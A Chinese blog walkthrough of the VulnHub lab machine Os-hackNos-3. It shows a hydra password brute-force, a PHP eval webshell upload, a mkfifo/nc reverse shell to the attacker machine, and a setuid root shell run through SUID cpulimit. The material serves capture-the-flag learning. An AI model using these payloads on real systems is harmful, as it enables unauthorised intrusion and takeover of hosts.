vulnhub靶机 Os-hacknos-3

最新推荐文章于 2024-07-08 13:50:27 发布

suqerbrave

最新推荐文章于 2024-07-08 13:50:27 发布

阅读量568

点赞数 1

分类专栏： vulnhub靶机文章标签： ubuntu linux ssh 安全渗透测试

本文链接：https://blog.csdn.net/witwitwiter/article/details/119953849

版权

vulnhub靶机专栏收录该内容

9 篇文章 0 订阅

订阅专栏

vulnhub靶机 Os-hacknos-3

靶机地址hackNos: Os-hackNos-3 ~ VulnHub

目标为普通用户的user.txt和root用户的root.txt

靶机配置

靶机netplan配置参考我之前的vulnhub靶机 0s-hackNos-2.1_witwitwiter的博客-CSDN博客

渗透测试

使用nmap进行端口扫描

└─# nmap -sV 192.168.5.134   
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-27 10:03 CST
Nmap scan report for 192.168.5.134
Host is up (0.000063s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
MAC Address: 00:0C:29:E4:F2:07 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.93 seconds

发现开启了80端口，那么去访问它

请添加图片描述

发现一个线索让我们去访问websec

使用dirsearch进行目录扫描

请添加图片描述

发现路径
http://192.168.5.134/scripts/

先访问http://192.168.5.134/scripts/发现第一个点击后返回网页根目录，除了automail.pl能访问外，其它的都不能访问，并且automail.pl里面没有比较有用的信息

请添加图片描述

那么我们选择访问http://192.168.5.134/websec发现一个博客

请添加图片描述

按照传统习惯，访问admin，发现一个后台登录，点击用户输入框时，弹出了一个用户名contact@hacknos.com猜测它为管理员账号

请添加图片描述

在http://192.168.5.134/websec/中获取可能的密码口令

cewl http://192.168.5.134/websec/ > cewl.txt

请添加图片描述

使用hydra爆破密码

hydra -l contact@hacknos.com -P cewl.txt 192.168.5.134 http-post-form "/websec/login:username=^USER^&password=^PASS^:Wrong email or password" -V

请添加图片描述

获得密码为Securityx

使用该密码登录进入后台，发现文件上传点

请添加图片描述

在上传文件后，发现文件被上传到了assets目录，在该目录中发现了.htaccess文件禁止访问php文件，那么将deny from all删除后保存。

请添加图片描述

然后使用菜刀等webshell工具连接一句话木马，这里的php.php的文件内容为

<?php @eval($_POST['qwer']);?>

这里使用哥斯拉连接。

请添加图片描述

获取普通用户的user.txt

/var/www/html/websec/assets/ >ls /home

blackdevil

/var/www/html/websec/assets/ >ls /home/blackdevil

user.txt

/var/www/html/websec/assets/ >cat /home/blackdevil/user.txt

bae11ce4f67af91fa58576c1da2aad4b

先试试suid提权

先在本地使用nc监听

nc -lvnp 9000

在webshell中输入rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash 2>&1|nc 192.168.5.129 9000 >/tmp/f

其中192.168.5.129是攻击机kali的ip

然后查找可供提权的命令

find /usr/bin -type f -perm -u=s 2>/dev/null
<ssets$ find /usr/bin -type f -perm -u=s 2>/dev/null
/usr/bin/mount
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/cpulimit
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/su
/usr/bin/sudo
/usr/bin/fusermount
/usr/bin/at
/usr/bin/pkexec
/usr/bin/chsh

发现没有可行的命令

尝试用cpulimit提权

在本地kali里面使用vim cpu.c进行编辑

#include<stdio.h>
#include<unistd.h>
#include<stdlib.h>

int main()
{
  setuid(0);
  setgid(0);
  system("/bin/bash");
  return 0;
}

使用gcc cpu.c -o exp编译为exp，上传之后使用chmod +x exp添加运行权限，使用cpulimit -l 100 -f ./exp进行提权

www-data@hacknos:/var/www/html/websec/assets$ ls
ls
cpuexp  cpuexp2  cpulimit.exp  cpulimit2exp  exp  gila-logo.png  php.php
www-data@hacknos:/var/www/html/websec/assets$ chmod +x exp
chmod +x exp
www-data@hacknos:/var/www/html/websec/assets$ cpulimit -l 100 -f ./exp
cpulimit -l 100 -f ./exp
Process 4887 detected
root@hacknos:/var/www/html/websec/assets#

最后获取root下的root.txt

root@hacknos:/var/www/html/websec/assets# cat /root/root.txt
cat /root/root.txt
########    #####     #####   ########         ########  
##     ##  ##   ##   ##   ##     ##            ##     ## 
##     ## ##     ## ##     ##    ##            ##     ## 
########  ##     ## ##     ##    ##            ########  
##   ##   ##     ## ##     ##    ##            ##   ##   
##    ##   ##   ##   ##   ##     ##            ##    ##  
##     ##   #####     #####      ##    ####### ##     ##


MD5-HASH: bae11ce4f67af91fa58576c1da2aad4b

Author: Rahul Gehlaut

Blog: www.hackNos.com

Linkedin: https://in.linkedin.com/in/rahulgehlaut

另一种解法

在/var/local/database中发现了经过加密的内容

www-data@hacknos:/var/www/html/websec/assets$ cat /var/local/database
cat /var/local/database
Expenses
Software Licenses,$2.78
Maintenance,$68.87
Mortgage Interest,$70.35
Advertising,$9.78
Phone,$406.80
Insurance,$9.04
Opss;fackespreadsheet

在网站中进行解密

请添加图片描述

解密网址Spreadsheet mimic - decode (spammimic.com)

得到密码明文Security@x@

www-data@hacknos:/var/www/html/websec/assets$ su blackdevil
su blackdevil
Password: Security@x@

To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

blackdevil@hacknos:/var/www/html/websec/assets$

甚至得到了提示使用sudo

那么直接使用sudo su root切换到root

blackdevil@hacknos:/var/www/html/websec/assets$ sudo su root
sudo su root
[sudo] password for blackdevil: Security@x@

root@hacknos:/var/www/html/websec/assets# cat /root/root.txt
cat /root/root.txt
########    #####     #####   ########         ########  
##     ##  ##   ##   ##   ##     ##            ##     ## 
##     ## ##     ## ##     ##    ##            ##     ## 
########  ##     ## ##     ##    ##            ########  
##   ##   ##     ## ##     ##    ##            ##   ##   
##    ##   ##   ##   ##   ##     ##            ##    ##  
##     ##   #####     #####      ##    ####### ##     ##


MD5-HASH: bae11ce4f67af91fa58576c1da2aad4b

Author: Rahul Gehlaut

Blog: www.hackNos.com

Linkedin: https://in.linkedin.com/in/rahulgehlaut